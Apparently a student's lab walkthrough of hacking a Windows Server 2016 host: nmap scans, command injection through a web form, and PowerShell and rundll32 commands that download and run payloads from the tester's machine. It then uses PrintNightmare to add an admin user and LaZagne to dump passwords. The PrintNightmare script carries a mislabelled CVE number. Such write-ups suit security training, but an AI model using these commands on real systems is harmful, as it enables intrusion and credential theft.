Part I - JA Smith

# Brief Enumerate the host (starting with an `nmap` scan to identify accessible ports/services), leverage the command injection flaw to gain reverse shell access, escalate privileges to `SYSTEM` or similar # Initial Enum - `ping` test - still coming back with lost packets after restating vpn and grabbing new `.ovpn` file - maybe there's a FW blocking ICMP ![[images/Pasted image 20260228193934.png]] - `nmap`scan - light with `-Pn` flag ![[images/Pasted image 20260228194222.png]] - `nmap` scan - detailed ![[images/Pasted image 20260228194530.png]] - check out webserver ![[images/Pasted image 20260228194557.png]] ![[images/Pasted image 20260228194615.png]] - try simple command injection ![[images/Pasted image 20260228194837.png]] - let's open up `burp` - POST request ![[images/Pasted image 20260228195646.png]] - we need to try different command injection operators - `&` and `;` don't seem to work - `|` works ![[images/Pasted image 20260228195757.png]] ![[images/Pasted image 20260228200319.png]] - NOTE: `SeImpersonatePrivilege` is enabled - Potato attack # Command Injection - we can either directly inject a revshell or inject a command to hit an HTTP server on Kali http that includes the revshell - Let's create an `.asp` payload with `msfvenom`, then host payload from kali and inject an IEX(IWR "command") ![[images/Pasted image 20260228200741.png]] - host `shell.asp` from Kali ![[images/Pasted image 20260228200812.png]] - setup listener on port 4444 ![[images/Pasted image 20260228200849.png]] - set up command injection with URL encoding ```powershell IEX (iwr 'http://10.10.15.203:8000/shell.asp') ``` ![[images/Pasted image 20260228201138.png]] - didn't work - let's try building a different command such that we are starting with `cmd.exe` and run the PowerShell command, then URL encode and try command injection ```powershell powershell.exe -Command "IEX (iwr 'http://10.10.15.203:8000/shell.asp')" ``` ![[images/Pasted image 20260228201714.png]] - okay the http server was hit that time but the shell did not call back to the listener - maybe because I was using `nc` instead of `meterpreter` - set up `multi/handler` in meterpreter and try again ![[images/Pasted image 20260228202126.png]] - still not hitting - let's try a different shell ![[images/Pasted image 20260228202427.png]] - this is `shell.exe` instead of `shell.asp` - update the command injection ![[images/Pasted image 20260228202516.png]] - still no hit on listener - try `smb_delivery` module from earlier in this module ![[images/Pasted image 20260228203126.png]] - set options and run ![[images/Pasted image 20260228203151.png]] - URL encode below command from above and command inject ```cmd rundll32.exe \\10.10.15.203\aAOFT\test.dll,0 ``` ![[images/Pasted image 20260228203233.png]] - we have a hit ![[images/Pasted image 20260228203423.png]] - light internal enum - systeminfo ![[images/Pasted image 20260228203514.png]] - privs & groups ![[images/Pasted image 20260228203539.png]] - enumerate patches - we have the KBs here ![[images/Pasted image 20260228203606.png]] - try `lazagne.exe` - nothing found - since we know the target is Server 2016 let's try `PrintNightmare` - `git clone` the repo and append the below to `CVE-2012-1675.ps1` ```powershell Invoke-Nightmare -NewUser "jacob" -NewPassword "password" -DriverName "print" ``` ![[images/Pasted image 20260228210132.png]] - host this `.ps1` file from Kali, and use the command injection to run as an IEX (IWR) command ```cmd powershell.exe -Command "IEX (iwr 'http://10.10.15.203:8000/CVE-2012-1675.ps1')" ``` - getting an error > maybe `IWR` isn't available ![[images/Pasted image 20260228210828.png]] - try a different command ```cmd powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.15.203:8000/CVE-2012-1675.ps1') ``` - i was still getting errors, but it was because the http server was not running int he proper directory - now the `.ps1` file was downloaded to the target and executed ![[images/Pasted image 20260228211348.png]] - try logging in with `rdp` > `redesktop` works but not `xfreerdp3` - got errors at first but after editing the`.ps1` file with a longer password that included symbols and numbers, we are on the box - light internal enum ![[images/Pasted image 20260228211921.png]] - now let's run lazange - now because we are privileged user we have lots of passwords ![[images/Pasted image 20260228212320.png]] - look for `confidential.txt` ```powershell get-childitem -Path "C:\" -Filter "confidential.txt" -File -Recurse ```